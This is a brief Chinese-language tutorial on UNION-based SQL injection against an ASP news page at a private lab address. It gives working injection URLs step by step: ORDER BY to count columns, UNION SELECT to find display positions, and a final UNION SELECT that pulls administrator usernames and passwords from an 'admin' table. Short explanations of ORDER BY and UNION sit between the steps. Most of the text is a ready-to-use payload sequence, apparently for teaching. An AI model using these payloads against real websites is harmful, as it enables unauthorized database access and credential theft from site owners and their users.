注入条件
页面有显示位,即在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数据展示在页面中,这个展示数据的位置就叫显示位。
找的注入点→查询列数→找到显示位→获取列中的信息
注入点:http://192.168.1.3:8008/onews.asp?id=45
查询列数
http://192.168.1.3:8008/onews.asp?id=45 order by 猜测的列数
http://192.168.1.3:8008/onews.asp?id=45 order by 11
返回正常,有11列
ORDER BY : 在查询结果按照指定字段名进行升序排序,除了指定字段名还可以指定字段的栏位进行排序,第一个查询字段为1,第二个为2,依次类推。
ORDER BY 1,2 DESC 意思是先按第一列排序.如果第一列相同的,按第二列降序排序…
ORDER BY 2,1 意思是先按第二列排序,如果第二列一样,再按第一列排序.
判断显示位
http://192.168.1.3:8008/onews.asp?id=45 union select 1,2, … from 已知表名
http://192.168.1.3:8008/onews.asp?id=45 union select 1,2,3,4,5,6,7,8,9,10,11 from admin
会暴露出可查询字段的编号
UNION操作符合并两个或多个SELECT语句的结果。
UNION内部的每个SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每个SELECT语句中的列的顺序必须相同。
获取列中的信息
http://192.168.1.3:8008/onews.asp?id=45 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin
会暴露出管理员用户及其密码
